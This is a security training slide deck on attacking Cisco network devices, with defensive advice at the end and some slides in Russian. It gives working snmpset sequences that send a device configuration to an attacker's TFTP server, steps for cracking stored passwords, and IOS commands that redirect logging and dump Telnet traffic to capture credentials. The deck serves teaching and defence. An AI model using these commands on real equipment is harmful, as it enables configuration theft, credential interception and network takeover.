Master class«Analysis of network infrastructure

security»

Sergey Pavlov

Positive Technologies

Introduction

DMZ

Internet

Branch

User networks

Server networks

Network hub

Laboratory work

Scanning

SNMP default community strings

Management accounts for Telnet and SSH

Network device default settings

Event logging

VPN

Summary

Part 1. Scanning

Attacker always use scanning as a first step to collect available services

The information can be used to:• bruteforce accounts and passwords• detect service versions

Practical task (1)

Start virtual machine

Scan a specified port of the network device via NMap software.

Part 2: SNMP default community strings

SNMPv1/2

Privileges in SNMP

• Read-only – this mode is used only to monitor the device, and not to manage it.

• Read-write is used for device monitoring and managing.

Here is an example of SNMP community string bruteforce via SNSCAN utility (McAfee):

Copy configuration file via SNMP

TFTP server

snmpset -v 1 -c private <device name> .1.3.6.1.4.1.9.9.96.1.1.1.1.2.666 integer 1snmpset -v 1 -c private <device name> .1.3.6.1.4.1.9.9.96.1.1.1.1.3.666 integer 4snmpset -v 1 -c private <device name> .1.3.6.1.4.1.9.9.96.1.1.1.1.4.666 integer 1snmpset -v 1 -c private <device name> .1.3.6.1.4.1.9.9.96.1.1.1.1.5.666 address <TFTP server address>.snmpset -v 1 -c private <device name> .1.3.6.1.4.1.9.9.96.1.1.1.1.6.666 string victim-config

snmpset -v 1 -c private <device name> .1.3.6.1.4.1.9.9.96.1.1.1.1.14.666 integer 1

///Copy file configuration (starup-config) //back to the devicesnmpset -v 1 -c private <device name> .1.3.6.1.4.1.9.9.96.1.1.1.1.2.670 integer 1snmpset -v 1 -c private <device name> .1.3.6.1.4.1.9.9.96.1.1.1.1.3.670 integer 1snmpset -v 1 -c private <device name> .1.3.6.1.4.1.9.9.96.1.1.1.1.4.670 integer 3snmpset -v 1 -c private <device name> .1.3.6.1.4.1.9.9.96.1.1.1.1.5.670 address <TFTP server address>.snmpset -v 1 -c private <device name> .1.3.6.1.4.1.9.9.96.1.1.1.1.6.670 string victim-configsnmpset -v 1 -c private <device name> .1.3.6.1.4.1.9.9.96.1.1.1.1.14.670 integer 1//Device reload to apply changes

Practical task (2)

Enable TFTP server

Bruteforce SNMP password

Copy configuration file to TFTP server

Part 3. Management accounts for Telnet and SSH

Privilege types

Default privileges• User has limited privileges (level 1) to execute basic

commands

High privileges

• «enable» (level 15) password is needed to gain privileges on Cisco devices

User password types

Without encryption• username cisco password 0 cisco

Weak encryption• username admin password 7 104F0D140C1953

There are a number of utilities used for restoring, for example, Cain&Abel. Restoring takes split seconds.

Password hash• enable secret 5 $1$1lSz$k.iGUgWvgxm27iJ/vaBfK0

Bruteforce is used for restoring via the following software: Cain&Abel, PasswordPro, John the Ripper, etc. Restoring time unpredictable period of time.

Practical task (3)

Restore “admin” user password

Restore enable password

Part 4. Network device default settings

Examples

Often, device configuration includes default values. We do not notice them, but they exist ;)

• If aaa new-model is enabled, the following values are used: aaa authentication login default local – for vty aaa authentication login default none – for con

• HTTP server does not depend on “AAA” service and uses “enable” password by default

Practical task (4)

Enter “AdMIn” instead of “admin” to login the device via Telnet

Login the device via HTTP using enable password only

Create new user via web interface

Check that new user can login via Telnet

Part 5. Event logging. GOOD or BAD?

Регистрация событий помогает:

• Искать неисправности в сети• Обнаруживать попытки НСД• Контролировать изменения конфигураций, устройств

НО! Регистрация событий может играть и негативную роль:

• При добавлении нового сервера регистрации в конфигурацию, злоумышленник получает те же данные, что и администратор сети

• Служба регистрации позволяет перехватить учетные записи и пароли пользователей в проходящем через устройство трафике

Функции регистрации событий

Add new event logging server

Add new serverMC#conf tMC(config)#logging 192.168.123.4

Delete the others…. to prevent interference ;)MC#conf tMC(config)#no logging 1.2.3.4

Unable to catch traffic?! But if you really want? … You can

MC#conf tMC(config)#logging trap 7MC(config)#access-list 122 permit tcp any any eq telnetMC(config)#endMC#debug ip packet 122 detail dump

New events are interesting but device traffic is also interesting, especially not-encrypted traffic. You can use You can use Cisco IOS undeclared features.

Practical task (5)

Enable logging server

Add new logging server on a network device

Log Telnet service traffic

Part 6. VPN

Why do I need VPN?

Only boundary devices are available from public networks without VPN.

VPN allows you to access services that are usually blocked by providers, for example, 445/TCP.

Network devices do not support all popular services. For example, it is impossible to start RDP session from a mobile device.

VPN types

GRE is a tunnel protocol that do not provide encryption. Its main aim is to encapsulate network level packets into IP packets.

L2TP is a tunnel protocol that do not provide encryption and confidentiality. It is based on an encapsulated protocol used to provide confidentiality.

PPTP is a tunnel protocol of PTP type. It allows to create tunnels for data exchange.

IPSEC allows you to confirm identity and/or to encrypt IP packets.

PPTP configuration example

aaa new-modelaaa authentication ppp default localvpdn enable!vpdn-group 1! Default PPTP VPDN group accept-dialin protocol pptp virtual-template 1 local name tunnel!interface Virtual-Template1 ip unnumbered FastEthernet0/1 ip mroute-cache peer default ip address pool default ppp encrypt mppe auto ppp authentication ms-chap!ip local pool default 1.1.1.10 1.1.1.100

Practical task (6)

Configure PPTP, connect to the device

Test if 1.1.1.1 host is available

Summary

Summary

Do not leave network devices without control, as if compromised, they allow attackers to manipulate the whole network

Use best practices for network device security settings

Use complex network device protection

Keep monitoring of network security

Additional data and links

SNMPv1/2 scanningSNSCAN

Hydra

Copy configuration via SNMP

PPTP configuration

BackTrack distribution kit

Thank you for your attention!

spavlov@ptsecurity.ru